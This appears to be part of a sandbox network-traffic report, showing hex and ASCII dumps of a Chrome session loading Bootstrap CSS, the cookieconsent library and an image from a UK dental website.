                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 7d 2e 64 69 73 70 6c
                                                                                                                                      Data Ascii: 3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.1}.display-2{font-size:5.5rem;font-weight:300;line-height:1.1}.displ
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 62 64 34 31 34 37 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 61 3e 63 6f 64 65 7b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e
                                                                                                                                      Data Ascii: size:90%;color:#bd4147;background-color:#f8f9fa;border-radius:.25rem}a>code{padding:0;color:inherit;background-color:inherit}kbd{padding:.2rem .4rem;font-size:90%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;fon
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d
                                                                                                                                      Data Ascii: .col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a 34 7d 2e 6f 72 64 65 72 2d 35 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72
                                                                                                                                      Data Ascii: 7%;flex:0 0 91.666667%;max-width:91.666667%}.col-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-1{-ms-flex-order:1;order:1}.order-2{-ms-flex-order:2;order:2}.order-3{-ms-flex-order:3;order:3}.order-4{-ms-flex-order:4;order:4}.order-5{-ms-flex-or
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65
                                                                                                                                      Data Ascii: ;max-width:83.333333%}.col-sm-11{-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-orde
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 6d 64 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6d 64 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65
                                                                                                                                      Data Ascii: flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-md-10{-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-md-11{-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-md-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.orde


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      46192.168.2.1649765104.17.25.144437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:26 UTC577OUTGET /ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js HTTP/1.1
                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:27 UTC950INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                      ETag: W/"5eb03e2d-4d5a"
                                                                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                      Expires: Mon, 14 Apr 2025 10:13:27 GMT
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7x2dR1ZroqmJjfE7DeoWnUqtRj2Fwf4ysKVmEPNjezn5vUkkTDrRShcDV%2Bt1c3Zt%2BK%2FiWNjNE5ktKtgBBaNM%2B%2BN1esBIynBOYiapF9EQcSImW0rvj7Oc8mSCg3RxJchnLepyFEyS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8795521aff2009ef-LAS
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 10:13:27 UTC419INData Raw: 34 64 35 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 68 61 73 49 6e 69 74 69 61 6c 69 73 65 64 29 7b 76 61 72 20 74 3d 7b 65 73 63 61 70 65 52 65 67 45 78 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 5c 2f 5c 7b 5c 7d 5c 28 5c 29 5c 2a 5c 2b 5c 3f 5c 2e 5c 5c 5c 5e 5c 24 5c 7c 5d 2f 67 2c 22 5c 5c 24 26 22 29 7d 2c 68 61 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 3d 22 20 22 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 28 69 2b 65 2e 63 6c 61 73 73 4e 61 6d 65 2b 69 29 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 6e 5c 74 5d 2f 67 2c 69 29 2e 69 6e 64 65 78 4f 66 28 69 2b 74 2b 69 29 3e 3d 30 7d 2c 61 64 64 43
                                                                                                                                      Data Ascii: 4d5a!function(e){if(!e.hasInitialised){var t={escapeRegExp:function(e){return e.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g,"\\$&")},hasClass:function(e,t){var i=" ";return 1===e.nodeType&&(i+e.className+i).replace(/[\n\t]/g,i).indexOf(i+t+i)>=0},addC
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 74 65 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 3d 2f 7b 7b 28 5b 61 2d 7a 5d 5b 61 2d 7a 30 2d 39 5c 2d 5f 5d 2a 29 7d 7d 2f 67 69 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 69 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 28 61 72 67 75 6d 65 6e 74 73 5b 31 5d 29 7c 7c 22 22 7d 29 7d 2c 67 65 74 43 6f 6f 6b 69 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 3b 20 22 2b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2c 69 3d 74 2e 73 70 6c 69 74 28 22 3b 20 22 2b 65 2b 22 3d 22 29 3b 72 65 74 75 72 6e 20 32 21 3d 69 2e 6c 65 6e 67 74 68 3f 76 6f 69 64 20 30 3a 69 2e 70 6f 70 28 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 7d 2c 73 65 74 43 6f 6f 6b 69 65 3a 66 75
                                                                                                                                      Data Ascii: teString:function(e,t){var i=/{{([a-z][a-z0-9\-_]*)}}/gi;return e.replace(i,function(e){return t(arguments[1])||""})},getCookie:function(e){var t="; "+document.cookie,i=t.split("; "+e+"=");return 2!=i.length?void 0:i.pop().split(";").shift()},setCookie:fu
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 23 22 2b 72 7d 2c 69 73 4d 6f 62 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20 4d 69 6e 69 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 4f 62 6a 65 63 74 7d 7d 3b 65 2e 73 74 61 74 75 73 3d 7b 64 65 6e 79 3a 22 64 65 6e 79 22 2c 61 6c 6c 6f 77 3a 22 61 6c 6c 6f 77 22 2c 64 69 73 6d 69 73 73 3a 22
                                                                                                                                      Data Ascii: #"+r},isMobile:function(){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)},isPlainObject:function(e){return"object"==typeof e&&null!==e&&e.constructor==Object}};e.status={deny:"deny",allow:"allow",dismiss:"
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 22 62 61 6e 6e 65 72 22 3a 22 66 6c 6f 61 74 69 6e 67 22 3b 74 2e 69 73 4d 6f 62 69 6c 65 28 29 26 26 28 69 3d 22 66 6c 6f 61 74 69 6e 67 22 29 3b 76 61 72 20 6e 3d 5b 22 63 63 2d 22 2b 69 2c 22 63 63 2d 74 79 70 65 2d 22 2b 65 2e 74 79 70 65 2c 22 63 63 2d 74 68 65 6d 65 2d 22 2b 65 2e 74 68 65 6d 65 5d 3b 65 5b 22 73 74 61 74 69 63 22 5d 26 26 6e 2e 70 75 73 68 28 22 63 63 2d 73 74 61 74 69 63 22 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 61 2e 63 61 6c 6c 28 74 68 69 73 29 29 3b 70 2e 63 61 6c 6c 28 74 68 69 73 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 6c 65 74 74 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 75 73 74 6f 6d 53 74 79 6c 65 53 65 6c 65 63 74 6f 72 26 26 6e 2e 70 75 73 68 28 74 68 69 73 2e 63 75 73 74 6f 6d 53 74 79 6c 65
                                                                                                                                      Data Ascii: "banner":"floating";t.isMobile()&&(i="floating");var n=["cc-"+i,"cc-type-"+e.type,"cc-theme-"+e.theme];e["static"]&&n.push("cc-static"),n.push.apply(n,a.call(this));p.call(this,this.options.palette);return this.customStyleSelector&&n.push(this.customStyle
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 6f 2c 22 63 63 2d 63 6c 6f 73 65 22 29 26 26 28 74 68 69 73 2e 73 65 74 53 74 61 74 75 73 28 65 2e 73 74 61 74 75 73 2e 64 69 73 6d 69 73 73 29 2c 74 68 69 73 2e 63 6c 6f 73 65 28 21 30 29 29 2c 74 2e 68 61 73 43 6c 61 73 73 28 6f 2c 22 63 63 2d 72 65 76 6f 6b 65 22 29 26 26 74 68 69 73 2e 72 65 76 6f 6b 65 43 68 6f 69 63 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 76 61 72 20 69 3d 74 2e 68 61 73 68 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 29 2c 6e 3d 22 63 63 2d 63 6f 6c 6f 72 2d 6f 76 65 72 72 69 64 65 2d 22 2b 69 2c 6f 3d 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 75 73 74 6f 6d 53 74 79 6c 65 53 65 6c 65 63 74 6f 72 3d 6f 3f 6e 3a 6e 75 6c 6c 2c 6f 26 26 64 28 69 2c 65 2c 22
                                                                                                                                      Data Ascii: o,"cc-close")&&(this.setStatus(e.status.dismiss),this.close(!0)),t.hasClass(o,"cc-revoke")&&this.revokeChoice()}function p(e){var i=t.hash(JSON.stringify(e)),n="cc-color-override-"+i,o=t.isPlainObject(e);return this.customStyleSelector=o?n:null,o&&d(i,e,"
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 31 2c 65 6c 65 6d 65 6e 74 3a 6c 2e 73 68 65 65 74 7d 3b 76 61 72 20 75 3d 2d 31 3b 66 6f 72 28 76 61 72 20 68 20 69 6e 20 73 29 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 68 29 26 26 6c 2e 73 68 65 65 74 2e 69 6e 73 65 72 74 52 75 6c 65 28 68 2b 22 7b 22 2b 73 5b 68 5d 2e 6a 6f 69 6e 28 22 3b 22 29 2b 22 7d 22 2c 2b 2b 75 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 74 2e 6e 6f 72 6d 61 6c 69 73 65 48 65 78 28 65 29 2c 22 30 30 30 30 30 30 22 3d 3d 65 3f 22 23 32 32 32 22 3a 74 2e 67 65 74 4c 75 6d 69 6e 61 6e 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 69 29 7b 69 66 28 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 69 29 29 7b 76 61 72 20 6e 3d 74 2e 68 61 73 68 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79
                                                                                                                                      Data Ascii: 1,element:l.sheet};var u=-1;for(var h in s)s.hasOwnProperty(h)&&l.sheet.insertRule(h+"{"+s[h].join(";")+"}",++u)}function v(e){return e=t.normaliseHex(e),"000000"==e?"#222":t.getLuminance(e)}function f(i){if(t.isPlainObject(i)){var n=t.hash(JSON.stringify
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 72 20 6e 3d 74 68 69 73 2e 72 65 76 6f 6b 65 42 74 6e 3b 69 66 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 6e 69 6d 61 74 65 52 65 76 6f 6b 61 62 6c 65 29 7b 76 61 72 20 6f 3d 74 2e 74 68 72 6f 74 74 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 21 31 2c 6f 3d 32 30 2c 73 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2d 32 30 3b 74 2e 68 61 73 43 6c 61 73 73 28 6e 2c 22 63 63 2d 74 6f 70 22 29 26 26 65 2e 63 6c 69 65 6e 74 59 3c 6f 26 26 28 69 3d 21 30 29 2c 74 2e 68 61 73 43 6c 61 73 73 28 6e 2c 22 63 63 2d 62 6f 74 74 6f 6d 22 29 26 26 65 2e 63 6c 69 65 6e 74 59 3e 73 26 26 28 69 3d 21 30 29 2c 69 3f 74 2e 68 61 73 43 6c 61 73 73 28 6e 2c 22 63 63 2d 61 63 74 69 76 65 22 29 7c 7c 74 2e 61 64 64 43 6c 61 73 73 28 6e 2c 22 63
                                                                                                                                      Data Ascii: r n=this.revokeBtn;if(this.options.animateRevokable){var o=t.throttle(function(e){var i=!1,o=20,s=window.innerHeight-20;t.hasClass(n,"cc-top")&&e.clientY<o&&(i=!0),t.hasClass(n,"cc-bottom")&&e.clientY>s&&(i=!0),i?t.hasClass(n,"cc-active")||t.addClass(n,"c
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 61 72 69 61 2d 6c 61 62 65 6c 3d 22 61 6c 6c 6f 77 20 63 6f 6f 6b 69 65 73 22 20 72 6f 6c 65 3d 62 75 74 74 6f 6e 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 20 63 6c 61 73 73 3d 22 63 63 2d 62 74 6e 20 63 63 2d 61 6c 6c 6f 77 22 3e 7b 7b 61 6c 6c 6f 77 7d 7d 3c 2f 61 3e 27 2c 64 65 6e 79 3a 27 3c 61 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 65 6e 79 20 63 6f 6f 6b 69 65 73 22 20 72 6f 6c 65 3d 62 75 74 74 6f 6e 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 63 6c 61 73 73 3d 22 63 63 2d 62 74 6e 20 63 63 2d 64 65 6e 79 22 3e 7b 7b 64 65 6e 79 7d 7d 3c 2f 61 3e 27 2c 6c 69 6e 6b 3a 27 3c 61 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 22 20 72 6f 6c 65 3d 62 75 74 74 6f 6e 20 74 61 62 69 6e 64 65
                                                                                                                                      Data Ascii: aria-label="allow cookies" role=button tabindex="0" class="cc-btn cc-allow">{{allow}}</a>',deny:'<a aria-label="deny cookies" role=button tabindex="0" class="cc-btn cc-deny">{{deny}}</a>',link:'<a aria-label="learn more about cookies" role=button tabinde
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 69 6f 6e 28 65 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 26 26 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 2c 74 2e 64 65 65 70 45 78 74 65 6e 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 7b 7d 2c 67 29 2c 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 26 26 74 2e 64 65 65 70 45 78 74 65 6e 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 65 29 2c 72 2e 63 61 6c 6c 28 74 68 69 73 29 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 64 3d 21 31 29 2c 6d 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 6c 61 63 6b 6c 69 73 74 50 61 67 65 2c 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 64 3d 21 31 29 2c 6d 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 77 68 69 74 65 6c 69 73
                                                                                                                                      Data Ascii: ion(e){this.options&&this.destroy(),t.deepExtend(this.options={},g),t.isPlainObject(e)&&t.deepExtend(this.options,e),r.call(this)&&(this.options.enabled=!1),m(this.options.blacklistPage,location.pathname)&&(this.options.enabled=!1),m(this.options.whitelis
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 74 68 69 73 2e 72 65 76 6f 6b 65 42 74 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 72 65 76 6f 6b 65 42 74 6e 29 2c 74 68 69 73 2e 72 65 76 6f 6b 65 42 74 6e 3d 6e 75 6c 6c 2c 66 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 6c 65 74 74 65 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 6e 75 6c 6c 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 70 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 4f 70 65 6e 28 29 7c 7c 28 65 2e 68 61 73 54 72 61 6e 73 69 74 69 6f 6e 3f 74 68 69 73 2e 66 61 64 65 49 6e 28 29 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 22 2c 74 68 69 73 2e 6f 70 74 69 6f
                                                                                                                                      Data Ascii: this.revokeBtn.parentNode.removeChild(this.revokeBtn),this.revokeBtn=null,f(this.options.palette),this.options=null},n.prototype.open=function(t){if(this.element)return this.isOpen()||(e.hasTransition?this.fadeIn():this.element.style.display="",this.optio


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      47192.168.2.164976191.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:26 UTC641OUTGET /wp-content/themes/dentalhealthstop/images/shield.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:27 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:27 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 6588
